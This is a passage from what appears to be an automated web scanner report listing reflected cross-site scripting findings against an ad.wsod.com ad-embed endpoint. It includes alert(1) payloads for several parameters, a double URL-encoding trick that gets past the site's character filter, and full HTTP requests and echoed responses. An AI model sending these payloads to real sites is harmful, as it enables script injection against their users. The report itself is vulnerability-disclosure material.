<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135738f08";alert(1)//e64aa15b64c/477.0.iframe.150x30/1300830308**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14
...[SNIP]...

1.160. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab3e4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5a7d79c881 was submitted in the REST URL parameter 3. This input was echoed as ab3e4"><script>alert(1)</script>f5a7d79c881 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ab3e4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5a7d79c881/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ab3e4"><script>alert(1)</script>f5a7d79c881/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.161. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c92f%2522%253balert%25281%2529%252f%252f31a589569f was submitted in the REST URL parameter 3. This input was echoed as 7c92f";alert(1)//31a589569f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x307c92f%2522%253balert%25281%2529%252f%252f31a589569f/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2658

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x307c92f";alert(1)//31a589569f/1300830324**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.162. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca1c8"><script>alert(1)</script>32f3224a8eb was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*ca1c8"><script>alert(1)</script>32f3224a8eb HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2663

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*ca1c8"><script>alert(1)</script>32f3224a8ebhttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.163. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcec5"-alert(1)-"c40782d0160 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*fcec5"-alert(1)-"c40782d0160 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2633

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*fcec5"-alert(1)-"c40782d0160">
...[SNIP]...

1.164. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55caa"><script>alert(1)</script>296a718dfe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&55caa"><script>alert(1)</script>296a718dfe2=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
o/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&55caa"><script>alert(1)</script>296a718dfe2=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.165. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82275"-alert(1)-"e21cd84f83a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&82275"-alert(1)-"e21cd84f83a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
o/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&82275"-alert(1)-"e21cd84f83a=1">
...[SNIP]...

1.166. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [ybt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18523</script><script>alert(1)</script>afcd3201317 was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;831918523</script><script>alert(1)</script>afcd3201317&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830247**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;831918523</script><script>alert(1)</script>afcd3201317&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244
...[SNIP]...

1.167. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yhdata parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fcfe</script><script>alert(1)</script>f4aa53a2d01 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=9fcfe</script><script>alert(1)</script>f4aa53a2d01&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:39:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829940**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=9fcfe</script><script>alert(1)</script>f4aa53a2d01&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW8
...[SNIP]...

1.168. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yyob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b08eb</script><script>alert(1)</script>58b6acd6d7e was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=b08eb</script><script>alert(1)</script>58b6acd6d7e&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830072**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=b08eb</script><script>alert(1)</script>58b6acd6d7e&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQ
...[SNIP]...

